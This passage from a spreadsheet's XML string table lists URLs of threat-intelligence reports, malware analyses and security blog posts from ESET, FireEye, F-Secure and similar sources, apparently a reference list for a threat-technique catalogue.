    <t>https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine</t>
  </si>
  <si>
    <t>https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_Operation_Interception.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf</t>
  </si>
  <si>
    <t>https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf</t>
  </si>
  <si>
    <t>http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/</t>
  </si>
  <si>
    <t>https://twitter.com/ESETresearch/status/1311762215490461696</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf</t>
  </si>
  <si>
    <t>https://recon.cx/2018/brussels/resources/slides/RECON-BRX-2018-Visiting-The-Snake-Nest.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/</t>
  </si>
  <si>
    <t>http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/</t>
  </si>
  <si>
    <t>http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf</t>
  </si>
  <si>
    <t>http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf</t>
  </si>
  <si>
    <t>http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf</t>
  </si>
  <si>
    <t>http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/</t>
  </si>
  <si>
    <t>https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2022/02/eset_threat_report_t32021.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/</t>
  </si>
  <si>
    <t>https://twitter.com/ESETresearch/status/1458438155149922312</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/</t>
  </si>
  <si>
    <t>https://objective-see.com/blog/blog_0x48.html</t>
  </si>
  <si>
    <t>https://blog.alyac.co.kr/2234</t>
  </si>
  <si>
    <t>https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf</t>
  </si>
  <si>
    <t>https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf</t>
  </si>
  <si>
    <t>https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/</t>
  </si>
  <si>
    <t>https://eclypsium.com/wp-content/uploads/2020/12/TrickBot-Now-Offers-TrickBoot-Persist-Brick-Profit.pdf</t>
  </si>
  <si>
    <t>https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/</t>
  </si>
  <si>
    <t>https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1</t>
  </si>
  <si>
    <t>https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql</t>
  </si>
  <si>
    <t>https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com</t>
  </si>
  <si>
    <t>https://www.endgame.com/blog/technical-blog/hunting-memory</t>
  </si>
  <si>
    <t>http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf</t>
  </si>
  <si>
    <t>https://arxiv.org/pdf/1611.00791.pdf</t>
  </si>
  <si>
    <t>https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process</t>
  </si>
  <si>
    <t>https://www.itprotoday.com/windows-78/eldos-provides-raw-disk-access-vista-and-xp</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/</t>
  </si>
  <si>
    <t>https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1</t>
  </si>
  <si>
    <t>https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py</t>
  </si>
  <si>
    <t>http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/</t>
  </si>
  <si>
    <t>https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/</t>
  </si>
  <si>
    <t>https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/</t>
  </si>
  <si>
    <t>https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/</t>
  </si>
  <si>
    <t>https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/</t>
  </si>
  <si>
    <t>https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/</t>
  </si>
  <si>
    <t>https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee</t>
  </si>
  <si>
    <t>https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/</t>
  </si>
  <si>
    <t>http://www.entrust.net/knowledge-base/technote.cfm?tn=8165</t>
  </si>
  <si>
    <t>https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/</t>
  </si>
  <si>
    <t>https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain</t>
  </si>
  <si>
    <t>https://www.coretechnologies.com/blog/windows-services/eventlog/</t>
  </si>
  <si>
    <t>https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/</t>
  </si>
  <si>
    <t>https://twitter.com/Evi1cg/status/935027922397573120</t>
  </si>
  <si>
    <t>https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/</t>
  </si>
  <si>
    <t>https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/</t>
  </si>
  <si>
    <t>https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes</t>
  </si>
  <si>
    <t>https://seclists.org/fulldisclosure/2015/Dec/34</t>
  </si>
  <si>
    <t>https://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/</t>
  </si>
  <si>
    <t>https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/</t>
  </si>
  <si>
    <t>https://expel.io/blog/finding-evil-in-aws/</t>
  </si>
  <si>
    <t>https://www.exploit-db.com/</t>
  </si>
  <si>
    <t>http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html</t>
  </si>
  <si>
    <t>https://www.exploit-db.com/google-hacking-database</t>
  </si>
  <si>
    <t>https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.226.3427&amp;rep=rep1&amp;type=pdf</t>
  </si>
  <si>
    <t>http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way</t>
  </si>
  <si>
    <t>https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/</t>
  </si>
  <si>
    <t>https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf</t>
  </si>
  <si>
    <t>https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf</t>
  </si>
  <si>
    <t>https://www.f-secure.com/documents/996508/1030745/CozyDuke</t>
  </si>
  <si>
    <t>https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf</t>
  </si>
  <si>
    <t>https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/</t>
  </si>
  <si>
    <t>https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf</t>
  </si>
  <si>
    <t>https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf</t>
  </si>
  <si>
    <t>https://www.ic3.gov/Media/News/2022/220120.pdf</t>
  </si>
  <si>
    <t>https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/</t>
  </si>
  <si>
    <t>https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf</t>
  </si>
  <si>
    <t>https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf</t>
  </si>
  <si>
    <t>https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do</t>
  </si>
  <si>
    <t>https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf</t>
  </si>
  <si>
    <t>https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml</t>
  </si>
  <si>
    <t>https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/</t>
  </si>
  <si>
    <t>https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/</t>
  </si>
  <si>
    <t>https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL_0.pdf</t>
  </si>
  <si>
    <t>https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre</t>
  </si>
  <si>
    <t>https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf</t>
  </si>
  <si>
    <t>https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf</t>
  </si>
  <si>
    <t>http://www.icir.org/vern/papers/meek-PETS-2015.pdf</t>
  </si>
  <si>
    <t>http://www.finfisher.com/FinFisher/index.html</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html</t>
  </si>
  <si>
    <t>https://www.troopers.de/troopers19/agenda/fpxwmn/</t>
  </si>
  <si>
    <t>https://www.fireeye.com/current-threats/apt-groups.html#apt19</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html</t>
  </si>
  <si>
    <t>https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html</t>
  </si>
  <si>
    <t>https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf</t>
  </si>
  <si>
    <t>https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html</t>
  </si>
  <si>
    <t>https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html</t>
  </si>
  <si>
    <t>https://www.brighttalk.com/webcast/10703/275683</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html</t>
  </si>
  <si>
    <t>https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf</t>
  </si>
  <si>
    <t>https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</t>
  </si>
  <si>
    <t>https://content.fireeye.com/apt/rpt-apt38</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html</t>
  </si>
  <si>
    <t>https://content.fireeye.com/apt-41/rpt-apt41</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html</t>
  </si>
  <si>
    <t>http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html</t>
  </si>
  <si>
    <t>https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html</t>
  </si>
  <si>
    <t>https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html</t>
  </si>
  <si>
    <t>https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html</t>
  </si>
  <si>
    <t>https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html</t>
  </si>
  <si>
    <t>https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/</t>
  </si>
  <si>
    <t>https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html</t>
  </si>
  <si>
    <t>https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2019/03/dissecting-netwire-phishing-campaign-usage-of-process-hollowing.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2014/05/the-pla-and-the-800am-500pm-work-day-fireeye-confirms-dojs-findings-on-apt1-intrusion-activity.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html</t>
  </si>
  <si>
    <t>https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html</t>
  </si>
  <si>
    <t xml:space="preserve">https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html </t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html</t>
  </si>
  <si>
    <t>https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/</t>
  </si>
  <si>
    <t>https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/</t>
  </si>
  <si>
    <t>https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/#601c77842a0a</t>
  </si>
  <si>
    <t>https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196</t>
  </si>
  <si>
    <t>https://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan</t>
  </si>
  <si>
    <t>https://blogs.forcepoint.com/security-labs/carbanak-group-uses-google-malware-command-and-control</t>
  </si>
  <si>
    <t>https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware</t>
  </si>
  <si>
    <t>https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf</t>
  </si>
  <si>
    <t>https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html</t>
  </si>
  <si>
    <t>https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html</t>
  </si>
  <si>
